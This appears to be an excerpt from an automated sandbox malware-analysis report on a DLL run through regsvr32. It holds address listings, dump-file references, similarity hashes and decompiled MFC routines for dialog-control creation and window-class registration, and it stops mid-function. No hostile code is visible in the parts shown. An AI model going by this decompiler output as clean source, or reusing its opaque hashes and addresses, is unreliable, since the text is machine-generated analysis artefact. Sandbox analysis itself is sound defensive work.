                                                                                                                0x1003ae0c
                                                                                                                0x1003ae04
                                                                                                                0x1003ae05
                                                                                                                0x1003ae05
                                                                                                                0x1003ae2a
                                                                                                                0x1003ae2f
                                                                                                                0x00000000
                                                                                                                0x1003ae2f
                                                                                                                0x1003ade3
                                                                                                                0x1003ad3f
                                                                                                                0x1003ad42
                                                                                                                0x1003ad52
                                                                                                                0x1003ad53
                                                                                                                0x1003ad54
                                                                                                                0x00000000
                                                                                                                0x1003ad54
                                                                                                                0x1003ad44
                                                                                                                0x1003ad47
                                                                                                                0x1003ad48
                                                                                                                0x00000000
                                                                                                                0x1003ad48
                                                                                                                0x1003ad0c
                                                                                                                0x1003ad0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ad10
                                                                                                                0x1003ad13
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ad15
                                                                                                                0x00000000
                                                                                                                0x1003ad15
                                                                                                                0x1003acf2
                                                                                                                0x1003acf6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acf8
                                                                                                                0x1003acfb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acfd
                                                                                                                0x00000000
                                                                                                                0x1003acfd
                                                                                                                0x1003aca8
                                                                                                                0x1003acac
                                                                                                                0x1003accd
                                                                                                                0x1003accd
                                                                                                                0x1003acd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acd2
                                                                                                                0x1003acd4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acd6
                                                                                                                0x1003acdb
                                                                                                                0x1003acb4
                                                                                                                0x1003acb4
                                                                                                                0x00000000
                                                                                                                0x1003acb4
                                                                                                                0x1003acdd
                                                                                                                0x1003acdf
                                                                                                                0x1003ace2
                                                                                                                0x1003ace5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acea
                                                                                                                0x00000000
                                                                                                                0x1003acea
                                                                                                                0x1003acae
                                                                                                                0x1003acb2
                                                                                                                0x1003acbe
                                                                                                                0x1003acc1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003acc3
                                                                                                                0x00000000
                                                                                                                0x1003acc3
                                                                                                                0x00000000
                                                                                                                0x1003acb2
                                                                                                                0x1003ab23
                                                                                                                0x1003ab26
                                                                                                                0x1003ab2a
                                                                                                                0x1003ab7d
                                                                                                                0x1003ab7d
                                                                                                                0x1003ab80
                                                                                                                0x1003ab85
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab94
                                                                                                                0x1003ab9c
                                                                                                                0x1003ab9f
                                                                                                                0x1003aba5
                                                                                                                0x1003aba8
                                                                                                                0x1003aba9
                                                                                                                0x1003abac
                                                                                                                0x1003abad
                                                                                                                0x1003abaf
                                                                                                                0x1003abb2
                                                                                                                0x1003abb5
                                                                                                                0x1003abb8
                                                                                                                0x1003abf9
                                                                                                                0x1003ac00
                                                                                                                0x1003ac03
                                                                                                                0x1003ac0c
                                                                                                                0x1003ac0e
                                                                                                                0x1003ac10
                                                                                                                0x1003ac56
                                                                                                                0x1003ac5a
                                                                                                                0x1003ac60
                                                                                                                0x1003ac66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ac6c
                                                                                                                0x1003ac6c
                                                                                                                0x1003ac72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ac78
                                                                                                                0x1003ac7c
                                                                                                                0x1003ac81
                                                                                                                0x1003ac85
                                                                                                                0x1003ac91
                                                                                                                0x1003ac92
                                                                                                                0x1003ac93
                                                                                                                0x1003ac94
                                                                                                                0x1003ac94
                                                                                                                0x00000000
                                                                                                                0x1003ac7c
                                                                                                                0x1003ac12
                                                                                                                0x1003ac17
                                                                                                                0x1003ac20
                                                                                                                0x1003ac20
                                                                                                                0x00000000
                                                                                                                0x1003ac20
                                                                                                                0x1003ac19
                                                                                                                0x1003ac1c
                                                                                                                0x1003ac1e
                                                                                                                0x1003ac27
                                                                                                                0x1003ac2d
                                                                                                                0x1003ac33
                                                                                                                0x1003ac39
                                                                                                                0x1003ac3a
                                                                                                                0x1003ac3b
                                                                                                                0x1003ac3e
                                                                                                                0x1003ac3f
                                                                                                                0x1003ac41
                                                                                                                0x1003ac44
                                                                                                                0x1003ac45
                                                                                                                0x1003ac48
                                                                                                                0x1003ac49
                                                                                                                0x1003ac4c
                                                                                                                0x1003ac4e
                                                                                                                0x1003ac54
                                                                                                                0x00000000
                                                                                                                0x1003ac54
                                                                                                                0x00000000
                                                                                                                0x1003ac1e
                                                                                                                0x1003abba
                                                                                                                0x1003abc3
                                                                                                                0x1003abc5
                                                                                                                0x1003abc7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abcd
                                                                                                                0x1003abd2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abd4
                                                                                                                0x1003abd7
                                                                                                                0x1003abd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003abdb
                                                                                                                0x1003abde
                                                                                                                0x1003abe1
                                                                                                                0x1003abe4
                                                                                                                0x1003abe7
                                                                                                                0x1003abe8
                                                                                                                0x1003abea
                                                                                                                0x1003abed
                                                                                                                0x1003abf0
                                                                                                                0x00000000
                                                                                                                0x1003abf0
                                                                                                                0x1003ab2c
                                                                                                                0x1003ab2f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab36
                                                                                                                0x1003ab37
                                                                                                                0x1003ab38
                                                                                                                0x1003ab3a
                                                                                                                0x1003ab3d
                                                                                                                0x1003ab3e
                                                                                                                0x1003ab4b
                                                                                                                0x1003ab50
                                                                                                                0x1003ab53
                                                                                                                0x1003ab5e
                                                                                                                0x1003ab73
                                                                                                                0x1003ab75
                                                                                                                0x1003ab77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ab77
                                                                                                                0x1003aaeb
                                                                                                                0x1003aaee
                                                                                                                0x1003aaf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaf3
                                                                                                                0x1003aaf6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaf8
                                                                                                                0x00000000
                                                                                                                0x1003aaf8
                                                                                                                0x1003aa98
                                                                                                                0x1003aa9b
                                                                                                                0x1003aa9d
                                                                                                                0x1003aab1
                                                                                                                0x1003aab1
                                                                                                                0x1003aab4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aab6
                                                                                                                0x1003aab6
                                                                                                                0x1003aab9
                                                                                                                0x1003aabb
                                                                                                                0x1003aac6
                                                                                                                0x1003aac6
                                                                                                                0x1003aabd
                                                                                                                0x1003aabe
                                                                                                                0x1003aabe
                                                                                                                0x1003aac8
                                                                                                                0x1003aacb
                                                                                                                0x1003aad6
                                                                                                                0x1003aadd
                                                                                                                0x1003aacd
                                                                                                                0x1003aacd
                                                                                                                0x1003aacd
                                                                                                                0x00000000
                                                                                                                0x1003aacb
                                                                                                                0x1003aa9f
                                                                                                                0x1003aaa2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaa4
                                                                                                                0x1003aaa6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaa8
                                                                                                                0x1003aaab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaad
                                                                                                                0x1003aaaf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aaaf
                                                                                                                0x1003aa85
                                                                                                                0x00000000
                                                                                                                0x1003aa85
                                                                                                                0x1003aa5b
                                                                                                                0x1003aa5f
                                                                                                                0x1003aa69
                                                                                                                0x1003aa69
                                                                                                                0x00000000
                                                                                                                0x1003aa69
                                                                                                                0x1003aa64
                                                                                                                0x1003aa67
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003aa67
                                                                                                                0x1003aa43
                                                                                                                0x00000000
                                                                                                                0x1003aa43
                                                                                                                0x1003aa2b
                                                                                                                0x00000000
                                                                                                                0x1003aa00
                                                                                                                0x1003aa00
                                                                                                                0x1003ae69
                                                                                                                0x1003ae6e
                                                                                                                0x1003ae6e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 3886170330-0
                                                                                                                • Opcode ID: 1c311965c9a92a02b697ca34eca03049ffc86a8a04e0e787f99ca824f4c7da7d
                                                                                                                • Instruction ID: c00d073da36ce4a3099d45c3b5c3b3b3ddb30e769adc7a323fe00a858e7edfc9
                                                                                                                • Opcode Fuzzy Hash: 1c311965c9a92a02b697ca34eca03049ffc86a8a04e0e787f99ca824f4c7da7d
                                                                                                                • Instruction Fuzzy Hash: E1E16631D0064A9FCF13CF90C880A8EB7F2EF4A396F21461AF955AF260D7759981DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001D1D8 Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1001D1D8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x100b9e70; // 0xbb35530
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1004764D(0x1008f20e, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				L1000140B(_t246 + 0x28, E100184C0());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10009F14(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1002D3F6(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							L100011E5(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E100337E7(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E1002B024(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E1002B631( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E1002C926( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E10018A1F(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E10033B9C(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					L100013E3( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1004763E(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

































                                                                                                                0x1001d1dc
                                                                                                                0x1001d1e0
                                                                                                                0x1001d1e7
                                                                                                                0x1001d1ea
                                                                                                                0x1001d1f1
                                                                                                                0x1001d1fd
                                                                                                                0x1001d200
                                                                                                                0x1001d203
                                                                                                                0x1001d209
                                                                                                                0x1001d20f
                                                                                                                0x1001d212
                                                                                                                0x1001d215
                                                                                                                0x1001d218
                                                                                                                0x1001d220
                                                                                                                0x1001d226
                                                                                                                0x1001d22d
                                                                                                                0x1001d237
                                                                                                                0x1001d23f
                                                                                                                0x1001d247
                                                                                                                0x1001d24a
                                                                                                                0x1001d24e
                                                                                                                0x1001d252
                                                                                                                0x1001d255
                                                                                                                0x1001d255
                                                                                                                0x1001d258
                                                                                                                0x1001d260
                                                                                                                0x1001d26a
                                                                                                                0x1001d279
                                                                                                                0x1001d27c
                                                                                                                0x1001d27f
                                                                                                                0x1001d282
                                                                                                                0x1001d288
                                                                                                                0x1001d290
                                                                                                                0x1001d292
                                                                                                                0x1001d294
                                                                                                                0x1001d298
                                                                                                                0x1001d29d
                                                                                                                0x1001d2a1
                                                                                                                0x1001d2a7
                                                                                                                0x1001d2a9
                                                                                                                0x1001d2ab
                                                                                                                0x1001d2ae
                                                                                                                0x1001d2ae
                                                                                                                0x1001d29d
                                                                                                                0x1001d2b1
                                                                                                                0x1001d2be
                                                                                                                0x1001d2cb
                                                                                                                0x1001d2ce
                                                                                                                0x1001d2d1
                                                                                                                0x1001d2d4
                                                                                                                0x1001d2d7
                                                                                                                0x1001d2e5
                                                                                                                0x1001d2e7
                                                                                                                0x1001d2e7
                                                                                                                0x1001d2ea
                                                                                                                0x1001d2ef
                                                                                                                0x1001d2f2
                                                                                                                0x1001d2f5
                                                                                                                0x1001d37b
                                                                                                                0x1001d37b
                                                                                                                0x1001d37e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001d2fb
                                                                                                                0x1001d2fb
                                                                                                                0x1001d2fb
                                                                                                                0x1001d2fd
                                                                                                                0x1001d301
                                                                                                                0x1001d304
                                                                                                                0x1001d308
                                                                                                                0x1001d30e
                                                                                                                0x1001d311
                                                                                                                0x1001d348
                                                                                                                0x1001d34e
                                                                                                                0x1001d351
                                                                                                                0x1001d353
                                                                                                                0x1001d357
                                                                                                                0x1001d369
                                                                                                                0x1001d369
                                                                                                                0x1001d359
                                                                                                                0x1001d362
                                                                                                                0x1001d362
                                                                                                                0x1001d36b
                                                                                                                0x1001d36f
                                                                                                                0x1001d313
                                                                                                                0x1001d315
                                                                                                                0x1001d318
                                                                                                                0x1001d31d
                                                                                                                0x1001d324
                                                                                                                0x1001d327
                                                                                                                0x1001d32f
                                                                                                                0x1001d334
                                                                                                                0x1001d337
                                                                                                                0x1001d33a
                                                                                                                0x1001d341
                                                                                                                0x1001d341
                                                                                                                0x1001d372
                                                                                                                0x1001d378
                                                                                                                0x00000000
                                                                                                                0x1001d385
                                                                                                                0x1001d385
                                                                                                                0x1001d385
                                                                                                                0x1001d388
                                                                                                                0x1001d38f
                                                                                                                0x1001d390
                                                                                                                0x1001d391
                                                                                                                0x1001d39b
                                                                                                                0x1001d393
                                                                                                                0x1001d393
                                                                                                                0x1001d393
                                                                                                                0x1001d3a1
                                                                                                                0x1001d3a3
                                                                                                                0x1001d3a4
                                                                                                                0x1001d3aa
                                                                                                                0x1001d3ab
                                                                                                                0x1001d3ae
                                                                                                                0x1001d3c2
                                                                                                                0x1001d3c6
                                                                                                                0x1001d3c9
                                                                                                                0x1001d3cb
                                                                                                                0x1001d3cd
                                                                                                                0x1001d3d0
                                                                                                                0x1001d3d9
                                                                                                                0x1001d3e2
                                                                                                                0x1001d421
                                                                                                                0x1001d435
                                                                                                                0x1001d441
                                                                                                                0x1001d454
                                                                                                                0x1001d460
                                                                                                                0x1001d46d
                                                                                                                0x1001d479
                                                                                                                0x1001d479
                                                                                                                0x1001d3e2
                                                                                                                0x1001d482
                                                                                                                0x1001d487
                                                                                                                0x1001d487
                                                                                                                0x1001d48d
                                                                                                                0x1001d492
                                                                                                                0x1001d4da
                                                                                                                0x1001d494
                                                                                                                0x1001d49c
                                                                                                                0x1001d49e
                                                                                                                0x1001d49e
                                                                                                                0x1001d4a2
                                                                                                                0x1001d4a6
                                                                                                                0x1001d4b1
                                                                                                                0x1001d4bb
                                                                                                                0x1001d4c3
                                                                                                                0x1001d4c4
                                                                                                                0x1001d4c5
                                                                                                                0x1001d4d4
                                                                                                                0x1001d4d4

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001D1F1
                                                                                                                • MapDialogRect.USER32(?,00000000), ref: 1001D282
                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 1001D2A1
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 1001D393
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 1001D39B
                                                                                                                • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 1001D435
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1001D487
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841959276-0
                                                                                                                • Opcode ID: 103160473dbaae82e234cb7b2b70863994f8aa932a9e54a4c368de6c924aeab4
                                                                                                                • Instruction ID: 5bad117b63ae69d34a77b33c97ab1783ec9515d92cd89bc3fc530cee35543a1f
                                                                                                                • Opcode Fuzzy Hash: 103160473dbaae82e234cb7b2b70863994f8aa932a9e54a4c368de6c924aeab4
                                                                                                                • Instruction Fuzzy Hash: 11B1F3B5900209AFDB04EFA8C984AED7BF4FF08354F11812AFD199B251E774E994CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100172B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 234COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100172B0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1001E302(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10049170(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1001E302(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x100bdcb8; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = L10016FC9(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1001726F(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1001726F(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
